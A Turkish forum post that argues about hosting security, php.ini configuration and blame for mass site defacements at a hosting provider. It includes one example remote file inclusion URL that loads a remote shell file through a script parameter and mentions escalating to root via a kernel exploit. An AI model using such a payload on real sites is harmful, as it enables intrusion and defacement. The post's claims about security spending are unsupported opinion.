Yani php.ini derlenince olay bitiyo mu? güvenlik bu kadar basit bişey mi? o kadar basitse web güvenlik sektörüne neden milyarlarca dolar para harcanıyor? Servera girip sunucudaki bütün sitelere index basılınca da scriptte hata mı arayacaksınız? hostbul.net e girip rodoswebe yapılan müşteri yorumlarını inceleyin yüzlerce insan yanılıyor olabilir mi? yada bu bir tesadüf mü?
Saçma saçma konuşma sebebiniz nedir ?
Ben diğer mesajımda diyorum ki,
Alıntı
Php sürümü isterse 4 olsun isterse 5 olsun php.ini güvenlik için derlenmişse(kaliteli, düzgün), açık her zaman scriptten kaynaklıdır.
demek ki rodosweb denilen hosting hizmetleri, php güvenlik ayarlarını yapmamıştır, siteleri sürekli index yemektedir. Unutmayın ki PHP.INI sadece php davranışlarını etkiler, düzgün okuyun.
Ayrıca;
Alıntı
Servera girip sunucudaki bütün sitelere index basılınca da scriptte hata mı arayacaksınız?
biliyorsunuz ki scriptlerden oluşan açıklardan dolayı uzaktan php dosyaları çalıştırılabiliyor. Örnek;
http://site.com/index.php?index=shelladresi.txt?
Uzaktan dosya çalıştırılarak, kernel açığı ile bütün sunucuda root yetkisine sahip olabilir, ne demek oluyor bu ?
AÇIK YİNE YAZILIMDAN KAYNAKLI
Ek olarak;
Güvenli server diye bir kavram yoktur, fakat bilgisayar mühendisliği okumuş her insan ağ güvenliği ve web güvenliği derslerinide görmüştür(
yazılım ve güvenlik diye geçer adı) veya konferanslarına katılmıştır, o kişiler %99 oranda sunucuyu güvenli hale getirebilirler. Milyarlarca dolar harcanmaz web güvenliği için, ağ güvenliği için
milyonlarca dolar harcanıyor, oda dünya genelinde unutmayın!